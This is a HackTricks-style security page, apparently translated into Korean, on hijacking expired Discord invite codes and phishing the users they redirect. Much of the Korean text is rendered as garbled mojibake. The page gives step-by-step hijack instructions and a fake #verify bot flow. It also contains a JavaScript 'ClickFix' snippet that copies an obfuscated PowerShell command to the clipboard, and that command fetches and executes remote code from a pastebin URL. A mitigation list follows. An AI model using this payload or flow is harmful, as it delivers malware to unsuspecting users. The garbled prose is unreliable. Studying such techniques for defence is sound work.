Discord μ΄λ μ½λ νμ·¨
Tip
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:HackTricks Training GCP Red Team Expert (GRTE)
Azure ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks μ§μνκΈ°
- ꡬλ κ³ν νμΈνκΈ°!
- **π¬ λμ€μ½λ κ·Έλ£Ή λλ ν λ κ·Έλ¨ κ·Έλ£Ήμ μ°Έμ¬νκ±°λ νΈμν° π¦ @hacktricks_liveλ₯Ό νλ‘μ°νμΈμ.
- HackTricks λ° HackTricks Cloud κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νΈλ¦μ 곡μ νμΈμ.
Discordμ μ΄λ μμ€ν μ·¨μ½μ μ μν νμμκ° λ§λ£λκ±°λ μμ λ μ΄λ μ½λλ₯Ό μλ‘μ΄ λ§μΆ€ λ§ν¬λ‘ μ£Όμ₯ν μ μκ² ν©λλ€(μμ, μꡬ λλ μ¬μ©μ μ μ). λͺ¨λ μ½λλ₯Ό μλ¬Έμλ‘ μ κ·νν¨μΌλ‘μ¨, 곡격μλ μλ €μ§ μ΄λ μ½λλ₯Ό μ¬μ λ±λ‘νκ³ μλ λ§ν¬κ° λ§λ£λκ±°λ μμ€ μλ²μ λΆμ€νΈκ° μ¬λΌμ§λ©΄ μ‘°μ©ν νΈλν½μ νμ·¨ν μ μμ΅λλ€.
μ΄λ μ ν λ° νμ·¨ μν
| μ΄λ μ ν | νμ·¨ κ°λ₯? | 쑰건 / λΉκ³ |
|---|---|---|
| μμ μ΄λ λ§ν¬ | β | λ§λ£ ν, μ½λλ μ¬μ© κ°λ₯ν΄μ§λ©° λΆμ€νΈ μλ²μ μν΄ λ§μΆ€ URLλ‘ μ¬λ±λ‘λ μ μμ΅λλ€. |
| μꡬ μ΄λ λ§ν¬ | β οΈ | μμ λκ³ μλ¬Έμμ μ«μλ‘λ§ κ΅¬μ±λ κ²½μ°, μ½λλ λ€μ μ¬μ© κ°λ₯ν΄μ§ μ μμ΅λλ€. |
| μ¬μ©μ μ μ λ§μΆ€ λ§ν¬ | β | μλ μλ²κ° Level 3 Boostλ₯Ό μμΌλ©΄, ν΄λΉ λ§μΆ€ μ΄λλ μλ‘μ΄ λ±λ‘μ μν΄ μ¬μ© κ°λ₯ν΄μ§λλ€. |
μ μ© λ¨κ³
- μ μ°°
discord.gg/{code}λλdiscord.com/invite/{code}ν¨ν΄κ³Ό μΌμΉνλ μ΄λ λ§ν¬λ₯Ό μν΄ κ³΅κ° μμ€(ν¬λΌ, μμ λ―Έλμ΄, ν λ κ·Έλ¨ μ±λ)λ₯Ό λͺ¨λν°λ§ν©λλ€.- κ΄μ¬ μλ μ΄λ μ½λλ₯Ό μμ§ν©λλ€(μμ λλ λ§μΆ€).
- μ¬μ λ±λ‘
- Level 3 Boost κΆνμ΄ μλ Discord μλ²λ₯Ό μμ±νκ±°λ κΈ°μ‘΄ μλ²λ₯Ό μ¬μ©ν©λλ€.
- μλ² μ€μ β λ§μΆ€ URLμμ λμ μ΄λ μ½λλ₯Ό ν λΉνλ €κ³ μλν©λλ€. μλ½λλ©΄, μ½λλ μ μμ μΈ μλ²μ μν΄ μμ½λ©λλ€.
- νμ·¨ νμ±ν
- μμ μ΄λμ κ²½μ°, μλ μ΄λκ° λ§λ£λ λκΉμ§ κΈ°λ€λ¦½λλ€(λλ μμ€λ₯Ό μ μ΄νλ κ²½μ° μλμΌλ‘ μμ ν©λλ€).
- λλ¬Έμκ° ν¬ν¨λ μ½λμ κ²½μ°, μλ¬Έμ λ³νμ μ¦μ μ£Όμ₯ν μ μμ§λ§, 리λλ μ μ λ§λ£ νμλ§ νμ±νλ©λλ€.
- μ‘°μ©ν 리λλ μ
- μ¬μ©μκ° μ΄μ λ§ν¬λ₯Ό λ°©λ¬Ένλ©΄ νμ·¨κ° νμ±νλ ν 곡격μκ° μ μ΄νλ μλ²λ‘ μννκ² μ μ‘λ©λλ€.
Discord μλ²λ₯Ό ν΅ν νΌμ± νλ¦
- μλ² μ±λμ μ ννμ¬ #verify μ±λλ§ λ³΄μ΄λλ‘ ν©λλ€.
- μ κ· μ¬μ©μκ° OAuth2λ₯Ό ν΅ν΄ μΈμ¦νλλ‘ μ λνλ λ΄(μ: Safeguard#0786)μ λ°°ν¬ν©λλ€.
- λ΄μ΄ μ¬μ©μλ₯Ό νΌμ± μ¬μ΄νΈ(μ:
captchaguard.me)λ‘ λ¦¬λλ μ ν©λλ€. μ΄λ CAPTCHA λλ μΈμ¦ λ¨κ³μ κ°μ₯μ μλλ€. - ClickFix UX νΈλ¦μ ꡬνν©λλ€:
- κΉ¨μ§ CAPTCHA λ©μμ§λ₯Ό νμν©λλ€.
- μ¬μ©μκ° Win+R λν μμλ₯Ό μ΄κ³ 미리 λ‘λλ PowerShell λͺ λ Ήμ λΆμ¬λ£κ³ Enterλ₯Ό λλ₯΄λλ‘ μλ΄ν©λλ€.
ClickFix ν΄λ¦½λ³΄λ μ£Όμ μμ
// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);
μ΄ μ κ·Ό λ°©μμ μ§μ νμΌ λ€μ΄λ‘λλ₯Ό νΌνκ³ μ¬μ©μ μμ¬μ μ€μ΄κΈ° μν΄ μΉμν UI μμλ₯Ό νμ©ν©λλ€.
μν μ‘°μΉ
- μ΅μν νλμ λλ¬Έμ λλ λΉμνλ²³ λ¬Έμκ° ν¬ν¨λ μꡬ μ΄λ λ§ν¬λ₯Ό μ¬μ©νμΈμ (λ§λ£λμ§ μμΌλ©° μ¬μ¬μ©ν μ μμ).
- μ κΈ°μ μΌλ‘ μ΄λ μ½λλ₯Ό λ³κ²½νκ³ μ€λλ λ§ν¬λ₯Ό μ·¨μνμΈμ.
- Discord μλ² λΆμ€νΈ μν λ° λ§μΆ€ URL μ²κ΅¬λ₯Ό λͺ¨λν°λ§νμΈμ.
- μ¬μ©μμκ² μλ²μ μ§μλ₯Ό νμΈνκ³ ν΄λ¦½λ³΄λμ λΆμ¬λ£μ λͺ λ Ήμ μ€ννμ§ μλλ‘ κ΅μ‘νμΈμ.
μ°Έκ³ λ¬Έν
- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery β https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
- Discord Custom Invite Link Documentation β https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link
Tip
AWS ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training AWS Red Team Expert (ARTE)
GCP ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:HackTricks Training GCP Red Team Expert (GRTE)
Azure ν΄νΉ λ°°μ°κΈ° λ° μ°μ΅νκΈ°:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks μ§μνκΈ°
- ꡬλ κ³ν νμΈνκΈ°!
- **π¬ λμ€μ½λ κ·Έλ£Ή λλ ν λ κ·Έλ¨ κ·Έλ£Ήμ μ°Έμ¬νκ±°λ νΈμν° π¦ @hacktricks_liveλ₯Ό νλ‘μ°νμΈμ.
- HackTricks λ° HackTricks Cloud κΉνλΈ λ¦¬ν¬μ§ν 리μ PRμ μ μΆνμ¬ ν΄νΉ νΈλ¦μ 곡μ νμΈμ.


